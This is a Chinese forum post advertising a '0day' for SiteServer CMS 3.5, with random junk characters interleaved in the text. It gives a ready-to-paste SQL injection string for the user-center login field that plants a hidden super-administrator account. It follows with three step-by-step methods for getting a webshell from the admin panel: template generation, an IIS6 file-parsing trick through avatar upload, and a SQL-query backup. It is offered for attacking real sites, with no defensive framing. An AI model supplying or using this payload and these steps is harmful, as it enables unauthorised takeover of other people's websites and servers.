找回密码
 立即注册
查看: 2953|回复: 0
打印 上一主题 下一主题

SiteServer CMS 0Day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:10:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
经测试秒杀最新的3.5版
- A( E% Y, u. v$ m. @3 t+ S4 v# o2 v+ H7 c6 }0 z( J
stieserver官网:www.siteserver.cn
6 e( v0 A) m. l  F- ~3 J* x1 N8 V% ?, G- J2 j# W0 }2 s

2 E! n( N2 m- F+ q! x+ ^) H/ s
6 f$ D- |% b, Q- x- a$ ]9 UEXP:
5 T# d! C) Y* k* d/ i" ?5 V4 F& B1 G# y1 B8 c
直接访问UserCenter/login.aspx
! Q# }+ y2 P8 {8 i1 E# v
- l0 N. p, [' w) Q) g' J2 E
1 s$ \3 M: @, Y! s) W+ d& a% S# I" W
用户名处输入:
9 k/ }  c: G1 _% J7 h! `' v2 J5 o) v& A1 W
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
7 h& a4 Y# n! U1 K+ M7 c- @* n
5 S( f3 |/ b, t0 C( ~' t, p 8 R' ]) j: i: y& O$ s$ i

- {, W$ w; L- M' X" a0 G密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
1 G6 V# {5 h6 F. g, h# n0 X
5 V6 `7 ?: v9 d * P7 |! S, x5 `2 I" u

' |2 L, h! L& h3 W6 j; x7 z之后再访问后台SiteServer/login.aspx用插入的用户登陆2 a7 s/ R8 j* U8 F* O+ V
% \! b, Z( v2 C" P; \5 V! ^

- C* |( L& V7 g# k' ?5 B: q1 e0 y
后台拿webshell的三种方法:4 T5 B7 Y2 k& H& r* |

5 f9 e' u+ G7 p& Z一、
9 L" r; f, |9 @  v/ I5 W' c7 U9 d1 B! J$ b# \
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
  i0 m7 T- q0 ?5 w
) ^1 R8 ]  k- d% |& E+ E- [( [, n% ]2 z二、
: L! _: M/ a: Y* y& P0 u
, M% a! M0 e$ y' Z成员权限-》添加用户-》用户名为:1.asp2 \5 ?5 ?( z. p8 b

. m, _% I: v8 B( D$ F( Mhttp://127.0.0.1/usercenter/$ X- Q1 n& @* n/ R+ I6 R

1 r- ^5 s# O. r0 j7 x, M用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
" F) A' N9 m7 \, o6 v4 z( w1 ?
  p  o) i: B; M+ A9 l/ z) {) t7 L(ps:后台添加用户时不会验证是否含有非法字符)
7 V/ k/ u% }5 `  Z- ^9 k9 ^5 ], Q4 G2 z# Q
三、
$ B1 l# O. H4 a+ p/ a6 l
1 W) e; f# I9 Y& p8 C8 r系统工具-》实用工具-》机器参数查看/ F  c1 `( u+ }, R1 P" u; a
可以看到数据库类型、名称,WEB路径1 J2 j, D3 h+ |( A. ?" J
9 {% K; D. |1 r6 T2 v7 E! L
系统工具-》数据库工具-》SQL语句查询" q+ s" F: T8 B: s
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。1 C; D# Y' `% [! U! X
* [9 B1 d7 n6 n7 v4 N( P
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表